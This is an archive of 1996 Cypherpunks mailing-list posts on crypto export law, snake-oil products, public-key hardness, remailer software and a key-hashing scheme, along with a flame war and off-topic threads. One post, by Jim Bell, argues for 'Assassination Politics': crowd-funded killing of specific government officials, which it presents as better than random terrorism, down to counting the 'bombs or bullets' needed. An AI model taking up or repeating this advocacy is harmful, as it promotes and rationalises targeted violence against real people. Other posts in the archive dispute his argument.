Dr.Dimitri Vulis KOTM wrote: > Adam Back writes: > > It would seem to me that the first insults were thrown by yourself, > > and that your strange habit of bouncing all the fallout to the list > > is perpetuating the problem. > > No. Let me remind you the sequence of events, in chronological > > order: [some discussion deleted] > > Also, I would point out that you yourself don't restrict yourself to > > purely crypto discussions (aside from this latest war), you for > > instance recently discussed driving licenses in NY. Not that I am > > Right - the discussion of drivers licences and other credentials is > > definitely crypto-relevant. The discussion, e.g., of the ethics of > > mandatory insurance is not. [more discussion deleted] I just want to add a comment about the "ethics of mandatory insurance". If one were to assume that the state mandating insurance, seat belts, and so on was motivated by genuine concern for the people, then OK (if that's what you want to think). OTOH, since the true motivations are not public knowledge (for the average person), and since some of these are things for which the police can check you out and inspect you more closely, they might be relevant after all, or at least as relevant as some of the other topics. From jimbell at pacifier.com Sun Sep 22 20:49:20 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 23 Sep 1996 11:49:20 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] Message-ID: <199609230102.SAA01161@mail.pacifier.com> At 12:38 PM 9/22/96 -0400, hallam at vesuvius.ai.mit.edu wrote: > >I agree with Bill, AP sounds like a very good club for the Exon types >to beat us with. But they're not doing it. They know about it, but they're NOT using it. This should tell you something. This really is no surprise to me; before I started publicizing AP, I tried to carefully consider whether letting the cat out of the bag was going to assist the government in stopping it. My conclusion was that they didn't stand a chance. If anything, they're afraid of publicizing the idea, because their opposition to it can look only self-serving. >Jim's latest comments sounded no different to me than the mealy mouthed >"understanding" messages that Sinn Fein publish about the IRA. Given >the opportunity to condem any attack on the President under AP rules >we get a non commital non-condemnation. Its the type of thing that Gerry >Adams says after his men have just killed two kids with a bomb in a litterbin >outside a MacDonalds. Don't try to tar me with that brush. I made it clear long ago that I'm opposed to truly random attacks on ordinary citizens. However, I hasten to add that I'd very much prefer that these attacks be re-targeted against the people who deserve them. However, I usually find that the people who make the biggest deal about disliking random citizen attacks are the ones who recommend replacing them with...nothing...and have no plan to solve the problems with any other method, violent or otherwise. [doctrinaire BS deleted] >As the Marxist idealogues got frustrated by their evident lack of progress >they turned to terrorism. The Bader Minehof gang believed that they could >spark the revolution by jolting society out of its complacency. Their >strategy was remarkably like AP. Somehow, I doubt it. Anybody who thinks an AP-like system would be effective for bringing in his pet communist (or fascist, or monarchist, or anything other than pure-anarchic) government is an idiot. AP is fundamentally anti-heirarchical in its leanings and effects. >If the heads of large corporations were >likely to be assasinated then noone would want to lead a large firm. Who said companies need "leaders"? Remember, I said AP is anti-heirarchical. Any heirarchies, particularly those forced on people, are strongly deterred. This includes social and religious heirarchies, BTW. Even corporate heirarchies would only exist if approved-of by the vast majority of the shareholders, most of whom will be the workers as well. > In >fact as any person with counter terrorism experience will tell you the >threat of death is remarkably ineffective as a means of intimidation. It >creates the opposite effect, strengthening the resolve of the target. I >discussed this point recently with someone close to Mossad who agreed. Under a set of circumstances similar to the status quo, that is not surprising. But that can change. That WILL change. People occupy positions of authority when they feel, personally, they are better off doing so than not. Give the average member of the public (not merely crazed "terrorists") the opportunity to remove those people, and you won't be able to keep them around. I mean, presumably they do their job for a salary and benefits, right? How many bombs or bullets will they tolerate, rather than resigning and taking a safer job? >Terrorism is becomming an increasing concern. The amount of damage an >individual can cause is much greater than that possible in the past. If anything, I think the advantage of AP is that it REDUCES the amount of damage that any given person has to cause, per citizen, to achieve his anti-government political ends. I've pointed out that it would only take a penny or two from each citizen, on average, to remove one of even the highest-level US officeholders. Far less than that if you include resignations. What I'm advocating is a system that makes it impossible for agents of the status quo to resist the opposition of the public, which is unlike the current system. Rather than have to build a bomb, or wait for somebody else to do so, the ordinary citizen only needs to make a modest contribution to the "revolution fund." And today, an officeholder can claim to resist "terrorism" based on the fact that he opposes the extreme action of a handful of people. What happens when they have to admit that a million people paid for that gun to be fired or that bomb to be planted? >There >are plenty of exhausted ideologies about which can be fashioned into >a justification of murder. Don't blame me for them. > Jim's post shows very clearly how Libertarianism >can be converted into a justification for terrorism. Its a very short gap >between being opposed to government and actively fighting against it. What, exactly, is the MEANING of "being opposed to government"? If you pay taxes to support that government (even if that support is not voluntary) those taxes mean that you are indeed acting to strengthen that government and assist its efforts. I suggest that you can't realistically claim "opposition to government" (other than rhetorical) under these circumstances. >I see libertarianism as the exhausted remnant of the mercantilism of the >1980s. As constructed it recognises only those rights which favour the >privileged in society and none of those which benefit the ecconomically >disadvantaged. Politically it reached its peak influence almost a decade >ago when Regan and Thatcher were at their zenith. The '94 congress will >probably be seen as the turning point in the political tide with the mainstream >of politics moving back to the left again. There will always be people arround >who conclude that the failure was not being close enough to the ideology. You've already made it clear you don't consider yourself a libertarian. Why go on with this stuff? >If the libertarians are not carefull they will be inexorably linked in the public mind >with the terrorists who act in their name. I think the stereotypical "terrorist" doesn't really claim to "act in their [the public's] name." The one recent counter-example that I've heard of, that of the EPR in Mexico, is a very welcome exception. If anything, I think the governments of the world are truly frightened that "terrorism" as commonly practiced will change from the "blow up random airliner" mode, passing through the "blow up nearby government building" mode, to "find and kill a particular official" mode. Far less collateral damage, far harder to whip up public opposition to in the press, etc. Jim Bell jimbell at pacifier.com From cjh at osa.com.au Sun Sep 22 20:54:27 1996 From: cjh at osa.com.au (cjh at osa.com.au) Date: Mon, 23 Sep 1996 11:54:27 +0800 Subject: (Fwd) Australian "ITAR" regulations In-Reply-To: <199609191322.AA02162@minbne.mincom.oz.au> Message-ID: <199609230132.LAA08960@rosella.osa.com.au> Peter Trei writes: > Forwarded from the cypherpunks list... > http://www.austlii.edu.au/cgi-bin/sinodisp.pl/au/legis/cth/consol_reg/cer439/sch13.html?query=cryptographic Thanks for posting this URL Peter. Of particular note is the heading: > 43. Other goods as follows: An anonymous opinion from inside the Defence Dept holds that electronic bits on a wire do not constitute goods, and as a result if you ship electronically, you are not subject to the regulations. If you ship a CD or floppy or other physical media containing software, you violate the regulations. I'll add this to the SSLeay legality FAQ - standard disclaimers apply of course, obtain professional legal advice before exporting SSLeay. ------------------------------------------------------------ Clifford Heath cjh at osa.com.au Open Software Associates Limited 29 Ringwood Street / P O Box 401 Phone +613 9871 1694 Ringwood VIC 3134 AUSTRALIA Fax +613 9871 1711 ------------------------------------------------------------ Deploy Applications across the Internet and Intranets! Visit our Web site at http://www.osa.com From loki at infonex.com Sun Sep 22 21:00:38 1996 From: loki at infonex.com (Lance Cottrell) Date: Mon, 23 Sep 1996 12:00:38 +0800 Subject: Snake-Oil FAQ In-Reply-To: <199609220854.DAA27487@mailhub.amaranth.com> Message-ID: At 9:44 AM -0700 9/22/96, Dale Thorn wrote: >The basic outline for any products included (and don't forget, just >getting included is some sort of endorsement, if you know what I mean) >could be a feature/bug listing, using common crypto terminology, and >could be followed by side-by-side argument paragraphs from the author >and from a reputable review panel. > >The usefulness of the list would probably depend on: >1. The participation of all those names people like to name-drop on this > forum. >2. And/or the quality of the list itself if done without (1.) above. > In this latter case, it could still be useful, but the variances in > evaluation owing to personal bias would be difficult to overcome. I like your suggestion for layout, and agree with your comments. It is my hope that "name" people will contact me. Once the site is ready, I will be sending out invitations to those who have not already contacted me. I am looking for a group of 10 or less people. Any other suggestions, comments? -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From dthorn at gte.net Sun Sep 22 21:00:40 1996 From: dthorn at gte.net (Dale Thorn) Date: Mon, 23 Sep 1996 12:00:40 +0800 Subject: Snake-Oil FAQ In-Reply-To: Message-ID: <3245E50C.4B10@gte.net> Timothy C. May wrote: > At 4:44 PM 9/22/96, Dale Thorn wrote: > >The basic outline for any products included (and don't forget, just > >getting included is some sort of endorsement, if you know what I > >mean) > >could be a feature/bug listing, using common crypto terminology, and > >could be followed by side-by-side argument paragraphs from the author > >and from a reputable review panel. > >The usefulness of the list would probably depend on: > >1. The participation of all those names people like to name-drop on > >this forum. > >2. And/or the quality of the list itself if done without (1.) above. > > In this latter case, it could still be useful, but the variances > >in evaluation owing to personal bias would be difficult to overcome. > The Basic Problem (tm) with a "Snake Oil FAQ" is that the very persons > most in need of it won't read it. > If those who post descriptions of their "Unbreakable Virtual > Whammo-Matic Really Complicated Transposition Cipher" have not > bothered to read Schneier or other basic texts on ciphers, why would > they bother to read a Snake Oil FAQ? This applies to their customers > as well. [additional text deleted] Maybe I shouldn't have tried to (slightly) change the subject. It was my thought that someone could encourage the person(s) who wanted to do a Snake-Oil product list to generalize the list, to be a more scholarly reference, and not just a blacklist. Since the original(?) proposal concerned actual products, and not just techniques which fit into neatly identifiable categories, that might justify a Consumer Reports type of review list for these products. From sryan at reading.com Sun Sep 22 21:19:05 1996 From: sryan at reading.com (steven ryan) Date: Mon, 23 Sep 1996 12:19:05 +0800 Subject: Snake-Oil FAQ Message-ID: <3.0b15.32.19960922214147.00551e40@reading.com> At 05:27 AM 9/22/96 -0700, you wrote: >My view is that people interested in buying and using crypto are either >bright enough to learn, or are not. A "Snake Oil FAQ" is largely >unnecessary, for either category. For the first, because they're bright. >For the second, because they're not. My view is that there is a large third group of people who are bright enough to learn, but don't have the time or inclination to read books or do extensive research on the subject. There are a lot of people using PGP for the wrong reason, not because they read the books or did the research. Nor do they even understand how it works as opposed to how it is used. They are using it because they cruised the net and read good things about it or heard it was cool. A Snake Oil Faq could help prevent these people from choosing wrong products. It would also be very helpful to have all the arguments in one place in one concise faq. Before I joined this list and read Applied Cryptography I was in a discussion in a previous job about securing one of our products. The programmer wanted to protect the key with a convoluted series of transpositions. I knew it was dumb but couldn't successfully argue the point why. A faq would have been helpful. There a lot of people with a casual interest in crypto who will remember that there is a faq on bad crypto. When the time comes they may be able to use those arguments to help avoid the use of bad crypto. Steven ------------------------------------ Steven Ryan - Reading Access - sryan at reading.com PGP Fingerprint: E8 A2 C5 A2 7A C4 77 93 0A 1B 1D C6 B9 2F 36 9B Finger me for my PGP public key From markm at voicenet.com Sun Sep 22 21:22:57 1996 From: markm at voicenet.com (Mark M.) Date: Mon, 23 Sep 1996 12:22:57 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: <199609220730.AAA20792@dfw-ix2.ix.netcom.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sun, 22 Sep 1996, Bill Stewart wrote: > The First Amendment does not contain the phrase "national security" > anywhere in it. It does, however, begin with a rather explicit > "Congress shall make no law" which it applies to a bunch of things. > However, the body of the Constitution does say there should be a > Supreme Court, and the Supreme Court has (fairly reasonably) given itself > the job of deciding what's Constitutional and what's not. > The Supremes have, over the years, made a bunch of generally outrageous > decisions about what kinds of speech are protected by the First Amendment > and what kinds aren't, though their opinions have been gradually > improving since some of the really appalling ones earlier in the century. I did a little searching and couldn't find anything about a national security exception in the Consitution. It's already a stretch to claim that disclosure of information vital to "nation security" is treason. The Espionage Act, which is so obviously unconstitutional, seems to make "harmful" speech illegal. Mark - -- PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMkWIpCzIPc7jvyFpAQFJFggAi9H/vbu9GN21rbjJnhyUoHy3TEZ+1ZsI in88Z9zqCuFyv28Q+vqKgTl0pvsBQNps1Ji4GXCv2LMaxGCbuzsvDLFxiqqVF8ev fC7MB7fl1r33ik1QCngygoPonb9yj79Ok0oKgms6sNNsVEkGe3hn5QHahNc7TRJX lzkHJ6ufVI/yNmh3KtqwWlAjE1vZ8esOrExRpiszrQDK1gDlNRFqA0Yor3bsDrlE wedkFUioEbK0Xv24ajeU0s9dYgkDt25OxUENT2ddnqzD1lfVOrVLx1zmroMl4mh1 MC1D2dd8ErN25/V83phFLbpzNA7EPKYQyNZtzOY28uD/XpoqziGS1g== =CrOM -----END PGP SIGNATURE----- From aba at dcs.ex.ac.uk Sun Sep 22 21:26:35 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Mon, 23 Sep 1996 12:26:35 +0800 Subject: provably hard PK cryptosystems Message-ID: <199609222158.WAA00325@server.test.net> extracting from part of another thread... Dimitri Vulis writes: > Adam Back writes: > > [...] I think I remember that you posted some time ago a way to have > > two plausible decryptions for one ciphertext, to enable things like > > duress keys, in terms of RSA. The problem with this, however is > > that RSA is currently very slow to use in its pure form for > > messages. > > I don't recall this one... My feeling about RSA is that one of these > days there will be a breakthrough allowing much faster factorization > (either through a better algorithm on a conventional computer, or by > a practical quantum computer) and then all the codes based on > factorization will become essentially plaintext. It's time to start > looking for other hard problem to base PKC on. I'm not sure about quantum computers, some people who know much more about particle physics than I do seemed initially sceptical, and didn't think it was doable. However I have read some optimistic sounding news clippings (on the list) which sounded as if things are progressing well, with techniques being found using redundancy to get around what were earlier problems of reliability. Is this accurate reporting (thinking of garbled stories by over enthusiastic journalists)? I'd be interested to hear opinions from anyone who does know about particle physics about the likihood of practical quantum computers being practical in the next 20 years or so. RSA has always had problems with two pitfalls in any proof of its hardness: no proof that RSA is as hard as factoring, and no proof that factoring is hard. Rabin and variants of it at least have the proof of being as hard as factoring. You mentioned your opinion that a vastly better factoring algorithm may yet be found. What about the possibility of finding proof of a useful lower bound for the complexity of factoring, do you have any thoughts on the likelihood of this being achieved? That would be a very significant result, and in the absence of a quantum attack would be as good as it gets. It would allow you to make realistic calculations about physical limits of attacking it, in a similar manner to the entropy calculations possible for brute force of symmetric ciphers. (Heat death of the sun before a solution even if every particle was part of hardware key cracking computer type arguments). One other area that did sound promising was some kind of mapping problem in n dimensional tiling that Tim was discussing at a physical meet while I was over in the US. A news clipping posted to cypherpunks a short time ago was talking about a researcher who had constructed a crypto system related to the problem of finding paths in a tiling problem (sounded like the same problem). The interesting part was that the researcher was reported as having a proof of hardness. Similarly is this being reported accurately? > E.g., does anyone know of any progress made on public-key > cryptosystems based on the word problem in semigroups, described in > Neal Wagner and Marianne Magyarik, _A public key cryptosystem based > on the word problem_, Advances in Cryptology: Proceedings of Crypto > '84, G. R. Blakley and D. Chaum, eds., Lecture Notes in Computer > Sciences #196, Springer Verlag, 1985, and also mentioned in Wayne > Patterson, _Mathematical Cryptology for Computer Scientists and > Mathematicians_, Rowman and Littlefield, 1987? Not familiar with the problem. Is it something you could explain briefly, or are there any on-line papers on the subject? > >From what I neard, NSA tried very hard to implement it and failed, > and the Soviets actually built a cryptosystem similar to what they > described. I tried to duplicate what the Soviets supposedly did, but > without success. Adam -- #!/bin/perl -sp0777i Message-ID: <199609230210.VAA01661@mailhub.amaranth.com> In <199609222016.PAA00572 at homeport.org>, on 09/22/96 at 03:16 PM, Adam Shostack said: > However, there is a real need for things like Mixmaster/DOS, >the WinSock remailer, and other tools that allow the average home user >to set up a remailer without taking the several days or more to >install a new OS on their system. There is a Dos version available. It is being used by Private Idaho for its Mixmaster Support. I am looking into doing an OS/2 port of Mixmaster to be used by my OS/2 front End. -- ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. Finger whgiii at amaranth.com for PGP Key and other info ----------------------------------------------------------- From gbroiles at netbox.com Sun Sep 22 21:33:09 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Mon, 23 Sep 1996 12:33:09 +0800 Subject: Macintosh Mixmaster port... Who's doing it? Message-ID: <3.0b19.32.19960922162606.006c1644@ricochet.net> At 03:16 PM 9/22/96 -0500, Adam Shostack wrote: > A real Mac port of Mixmaster, that integrated with Claris >EMailer and Eudora would be a huge boon to the millions of Mac users >out there. I have no doubt that Vinnie's mac crypto conference talked >a lot about this sort of thing. Actually, the Mac crypto conference didn't spend any time at all on Mixmaster - which is not intended as a criticism of either the conference or of Mixmaster, but it just didn't happen. I gave a very short talk and said that I thought the Mac needed three apps, for people who wanted to jump in a write something useful to the cause of privacy on the net and didn't want to reinvent any wheels: a remailer client with a good user interface, a Mac-native remailer, and an implementation of DC-nets. Mixmaster would, of course, address two of those three. Lucky tells me that there is already a Mac implementation of DC-nets, but it doesn't seem to be very well known. My impression of the demographics of the conference was that it was folks who are mostly working developers who aren't necessarily up-to-the minute on crypto and ecommerce stuff, but are interested enough to at least think about including it in their applications. I'm pottering around with a Java-based remailer that acts like a POP client so it can run on a client machine, not a Unix box; but other people should take that as a challenge to see if they can finish one before/better than me, not a reason to avoid writing one. Hal Finney has already done some very nice work with Java and mailing; see his home page (the address of which I don't have immediately at hand) for more details. For what it's worth, I think future remailer/Mixmaster development might do well in Java. I'm not especially sold on or trusting of the alleged security or trustability features of Java (sorry, no offense) but I *do* think it's a neat tool for building non-machine specific network aware applications. Ignore the fact that people use it to build silly animations or that downloadaded applets may or may not be secure - it's still useful as a development tool. -- Greg Broiles | "We pretend to be their friends, gbroiles at netbox.com | but they fuck with our heads." http://www.io.com/~gbroiles | | From snow at smoke.suba.com Sun Sep 22 21:58:36 1996 From: snow at smoke.suba.com (snow) Date: Mon, 23 Sep 1996 12:58:36 +0800 Subject: The Near-Necessity of Health Insurance In-Reply-To: Message-ID: <199609230140.UAA00443@smoke.suba.com> Mr. May said: > However, I am thinking about getting some. Not so much because I'm getting > older, but because I fear a new phenomenon: hospital emergency rooms > refusing admittance of patients unless they can present the proper > patient-unit ID card (showing one is enrolled in Blue Shield, Blue Cross, > Kaiser, or whatever). > Anyway, I'm thinking of finally bowing to the inevitable and starting to > fork out $200-300 a month for health care I am unlikely to routinely use. There is a "class" of insurance (and I am sure that someone will cornect me if I am wrong) whose name I forgot, but it is more or less "Calamity" or "serious accident" insurance. It doesn't cover things like sore throats, physicals (something you might want to look into, they can catch things before they get serious, and you are getting along in years), simple stitches &etc, but does cover things like getting nailed by a drunk driver, as presumably accidental shootings by black clad ninjas. Consult your local fraudmeister for more information. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From adam at homeport.org Sun Sep 22 22:05:19 1996 From: adam at homeport.org (Adam Shostack) Date: Mon, 23 Sep 1996 13:05:19 +0800 Subject: Evolving algorithm for faster brute force key searches? In-Reply-To: Message-ID: <199609230314.WAA01337@homeport.org> Timothy C. May wrote: | With some weak ciphers, this might work. I think Schneier makes some | comments about who's looked at this. But weak ciphers are not too | interesting. At the most recent Crypto, someone mentioned that FEAL is useful because just about any new attack you can think of works well against it. I think it was Susan Langford. Weak systems are thus useful for research and training purposes. I suspect Tim is on the money with a genetic algorithim having a flat `fitness landscape,' but there may be something that a human misses which an evolved algorithim finds. Also, it may be possible to evolve something against a reduced round version of a cipher (using a training space that is not flat) that will still work better than brute force against a full system. If you have cycles to spare, it might be an interesting avenue of research. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From snow at smoke.suba.com Sun Sep 22 22:44:07 1996 From: snow at smoke.suba.com (snow) Date: Mon, 23 Sep 1996 13:44:07 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <19960918160153703.AAE88@IO-ONLINE.COM> Message-ID: <199609230247.VAA00522@smoke.suba.com> Mr. Adams wrote: > On Sun, 15 Sep 1996 17:13:53 -0700, Dale Thorn wrote: >>> And that's good. The world population really should go back to around > say, explaining an integral. (or even an equation for that matter) > As a side note, how about some real welfare reform: mandatory birth control > (and pay for that; it's *much* cheaper) and benefits go DOWN for additional > births. But, But, But...What about the Children? Petro, Christopher C. petro at suba.com snow at smoke.suba.com From Scottauge at aol.com Sun Sep 22 22:51:27 1996 From: Scottauge at aol.com (Scottauge at aol.com) Date: Mon, 23 Sep 1996 13:51:27 +0800 Subject: Internet File System? Message-ID: <960922232858_108284943@emout01.mail.aol.com> This is actually a good idea. There is something in the UNIX world called NFS (network file system). It is based on TCP/IP sockets. I do not know if you know anything about UNIX, but the file system used does not have logical drives (like a: or b: etc), just one huge tree that can span across many harddrives on many computers, thus making them all look like one. NFS helps to connect the other computer's file systems to the network tree. I think it is pretty cool... There is an RFC for it, though I do not remember the number. I read it once cuz I was planning a windows 95 version so I can hook my laptop up to my UNIX computers, but I found software to do it with and was like, why should I kill time on it when I could be using it to make money! It is very complete and designed to be implemented in C. Since Java is so close to C, a port could probably be made fairly easily (provided ya know something about writing file systems/operating systems ;) ) From blancw at cnw.com Sun Sep 22 22:54:51 1996 From: blancw at cnw.com (blanc) Date: Mon, 23 Sep 1996 13:54:51 +0800 Subject: LD Message-ID: <01BBA8C5.36647EC0@king1-20.cnw.com> Dr. Dimitri Vulius, you made this remark to someone: ...You really should get to know L.D. better before you repeat the lies Timmy May spreads about him. ......................................................................................... May I recommend that you read the content within these urls: http://www.csn.net/~ldetweil/ and especially: ftp://crvax.sri.com/risks/15/risks-15.27 (and 28) These contain a history which will clarify for you some of the comments made about L.D.'s relationship to the list, Tim May, etc. .. Blanc From pgut001 at cs.auckland.ac.nz Sun Sep 22 23:37:24 1996 From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz) Date: Mon, 23 Sep 1996 14:37:24 +0800 Subject: Transforming variable-length to fixed keys Message-ID: <84345225525232@cs26.cs.auckland.ac.nz> I posted this to sci.crypt recently but the response to it was rather underwhelming, so I thought I'd repost it here to see if anyone has any comments on it. What it is is a scheme for transforming arbitrary user keys (typically a long passphrase) into a fixed-length key for a particular algorithm. This has the following properties: 1. The user key 'userKey' is transformed into an algorithm-specific key 'key' using a number of 'iterations' of a hash algorithm 'hash()'. 2. The transformation is strongly serialized so that any form of attack involving parallelization or precomputation isn't possible. 3. The transformation is non-reversible, so that recovering the transformed key won't recover the original key. 4. The result of the transformation is algorithm-dependant, so that if an attacker recovers a transformed key for one algorithm they can't recover the transformed key (from the same user key) for another algorithm. 5. The transformation can be iterated as often as required to make password-guessing attacks difficult. 6. The transformation process is algorithm-independant and can use any type of hash algorithm and original and transformed key size. The transformation algorithm (which was designed with the help of John Kelsey) is as follows: key[] = { 0 }; state = hash( algorithm, mode, parameters, userKey ); for count = 1 to iterations for length = 1 to keyLength (in hash_output_size blocks) state = hash( state ); key[ length ] = hash( state, userKey ); The state acts as an RNG which ensures that the key hashing is serialized. The initial state depends on all encryption parameters, not just the user key. If we hashed the user key directly and then used it for a number of algorithms then someone who could recover the transformed key for one algorithm could compromise it if used for other algorithms (for example recovering a DES key would also recover half an IDEA key). Hashing all algorithm-related parameters means that a successful attack one an algorithm, mode, or configuration won't allow the key for any other algorithm, mode, or configuration to be recovered. The code which implements the iterated hashing is: /* Hash the variable-length input to a fixed-length output */ memset( key, 0, keyLength ); for( count = 0; count < iterations; count++ ) { for( keyIndex = 0; keyIndex < keyLength; keyIndex += hashOutputSize ) { /* state = hash( state ); key[ n ] = hash( state, userKey ) */ hash( state, state, hashOutputSize, HASH_ALL ); hash( NULL, state, hashOutputSize, HASH_START ); hash( temp, userKey, userKeyLength, HASH_END ); | | | output input input size /* Copy as much of the hashed data as required to the output */ length = ( keyLength - keyIndex ) % hashOutputSize; for( i = 0; i < length; i++ ) key[ i ] ^= temp[ i ]; } } Peter. From rodger at interramp.com Sun Sep 22 23:49:23 1996 From: rodger at interramp.com (Will rodger) Date: Mon, 23 Sep 1996 14:49:23 +0800 Subject: Where to write crypto? Message-ID: <199609230203.WAA03418@interramp.com> -----BEGIN PGP SIGNED MESSAGE----- On Sat, 21 Sep 1996, Dan McGuirk wrote: >>| > If I want to go to a country outside the United States to write >>| > cryptographic code that will be freely distributable, what's the best >>| > place to go? >>| >>| Or, on the other hand, is there no way that a U.S. citizen can legally do >>| this? >> To which Adam Shostack replied: >> Thats not clear. The ITARs seem, on their face, to create a >>prior restraint on speech based on its content, and forbid Americans >>the right to leave the country to pursue their livlihoods. The odds >>of geting persecuted seem pretty low. Could be. But prominent crypto atty. Ken Bass told me he thought such actions would be vigorously prosecuted - quicker than you could say "global proliferation." Thing to notice here: no prominent cryptographer in the US has come forth and said "yes, I helped write strong crypto abroad." Which isn't to say most of them aren't traveling abroad frequently these days - take, e.g. the presence of M. Blaze, W. Diffie et al. at the OECD in Paris this week. >> As to the (predictable) comment that I'm not doing this, I'd >>be happy to entertain offers of crypto work that are not in the US, >>possibly leading to me being a test case. >> Call before you do, Adam; I'd kill to have that story first... Will Rodger Washington Bureau Chief Inter at ctive Week -----BEGIN PGP SIGNATURE----- Version: 2.9 iQEVAgUBMkXvQ0cByjT5n+LZAQGLyQf8Ctlf2JVeYI8Ws47YovJ0fhF3nzf9ihLd nHzZNqGpEVGVcOXYw2u84jV68y9Y7M3vdo/BDZCA3G0T8zZopmpiNZHgblh15ndP jPdYRkz4+7NnEn/Tz/1LQS6SVp/LA1G/qoCCNqGuYneSVkZxxsoeoEp9ZdCMhDE9 iq7IEI+pyY44vnSWvo65YNQZXt4thf94E94pspoNWC+DNwRDj8BkK28MpM3vduqD i/cViVUcKOLVg/b31HTVrq0rwWClfD0+J4a4F8AcGcf4SwedGCVaUAdSWRw0FQTJ 6AioCSd5Cs/g9k+xxaqRMzExJcBphwnlCZvA+qpgjY+KdagaEqJwGA== =vyTv -----END PGP SIGNATURE----- From markm at voicenet.com Mon Sep 23 00:50:30 1996 From: markm at voicenet.com (Mark M.) Date: Mon, 23 Sep 1996 15:50:30 +0800 Subject: Go away CIA In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sun, 22 Sep 1996, Shane Brath wrote: > On Sat, 21 Sep 1996, Wearen Life wrote: > > > I wont be suprised if they where ALSO watching who was visting your page. > > I think now is the time to start looking in your hard drive or floppy > > disk for anything that my incrimanate you. (did i spell that right)? > > My 2 cents. > > But how would they go about globaly watching who goes to your URL, unless > they hack into your server and look at the log, or have a network sniffer > at a access point feeding you? That may have been what they were trying to do when trying to snarf the passwd file. I can't imagine why they would want to do this -- there's nothing illegal about mirroring the page. Maybe I just lack imagination... Mark - -- PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMkXrjizIPc7jvyFpAQEcYQgApFV124tsvqSlqPokbGTc1LC49IKDb5zs RPJvGrwMdVAOwg7BY0g2M1uhD8MhD7H72ZYFqKkZfOCvZ+kkwqzSqguzRLo2clIb oJVqCYsA8QYDodKnqRoCGi9huBhvqQ8nLJSKIsPHfhYyvP9AnUjwHnVVCzPLL7DX hDbRc5ZISBrTh0Hxo2+qsB/GIR4JYNLx0ljL1uloMLDxCIso74EUojXl3tNsiGlz Ym4jq9jFYqE4NkJ+gluqhxjPVcpoqcRCxQG5EXAi5Q2RJ4ANEKUzu98FyGynUX81 CICwL0UxYaGNaoN9BrpH9tzofEGCLz+k6oLzWeLODYxkpvlcNUY7Cg== =q1Lq -----END PGP SIGNATURE----- From bdavis at thepoint.net Mon Sep 23 01:17:00 1996 From: bdavis at thepoint.net (Brian Davis) Date: Mon, 23 Sep 1996 16:17:00 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: Message-ID: On Sun, 22 Sep 1996, Mark M. wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > On Sun, 22 Sep 1996, Bill Stewart wrote: > > > The First Amendment does not contain the phrase "national security" > > anywhere in it. It does, however, begin with a rather explicit > > "Congress shall make no law" which it applies to a bunch of things. > > However, the body of the Constitution does say there should be a > > Supreme Court, and the Supreme Court has (fairly reasonably) given itself > > the job of deciding what's Constitutional and what's not. > > The Supremes have, over the years, made a bunch of generally outrageous > > decisions about what kinds of speech are protected by the First Amendment > > and what kinds aren't, though their opinions have been gradually > > improving since some of the really appalling ones earlier in the century. > > I did a little searching and couldn't find anything about a national security > exception in the Consitution. It's already a stretch to claim that disclosure > of information vital to "nation security" is treason. The Espionage Act, which > is so obviously unconstitutional, seems to make "harmful" speech illegal. There isn't such a clause. The allowed restrictions were developed in case law. Constitutional literalists take note: the First Amendment says nothing about what the executive branch or the states can do .... EBD > > Mark > - -- > PGP encrypted mail prefered. > Key fingerprint = d61734f2800486ae6f79bfeb70f95348 > http://www.voicenet.com/~markm/ > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.3 > Charset: noconv > > iQEVAwUBMkWIpCzIPc7jvyFpAQFJFggAi9H/vbu9GN21rbjJnhyUoHy3TEZ+1ZsI > in88Z9zqCuFyv28Q+vqKgTl0pvsBQNps1Ji4GXCv2LMaxGCbuzsvDLFxiqqVF8ev > fC7MB7fl1r33ik1QCngygoPonb9yj79Ok0oKgms6sNNsVEkGe3hn5QHahNc7TRJX > lzkHJ6ufVI/yNmh3KtqwWlAjE1vZ8esOrExRpiszrQDK1gDlNRFqA0Yor3bsDrlE > wedkFUioEbK0Xv24ajeU0s9dYgkDt25OxUENT2ddnqzD1lfVOrVLx1zmroMl4mh1 > MC1D2dd8ErN25/V83phFLbpzNA7EPKYQyNZtzOY28uD/XpoqziGS1g== > =CrOM > -----END PGP SIGNATURE----- > > From wmono at direct.ca Mon Sep 23 01:41:59 1996 From: wmono at direct.ca (William Ono) Date: Mon, 23 Sep 1996 16:41:59 +0800 Subject: Jena Remailer In-Reply-To: Message-ID: Sorry to followup on myself, but I made a mistake in the help file. On Sun, 22 Sep 1996, William Ono wrote: > How do I .. > ~~~~~~~~~~~ > ..request Email to be delivered? > > - Create a file containing the following: > > Reply-To: address at for.delivery > > Leave a blank line after the header. > > - Save the file. > > - Run 'pgp -esa -u "pseudonym" anon at as-node filename' to sign the mail > with the nym's key, and encrypt it for the server. > - Mail the result to anon at as-node.jena.thur.de with a Subject: send header. Sorry about that, folks. -- William Ono PGP Key: F3F716BD fingerprint = A8 0D B9 0F 40 A7 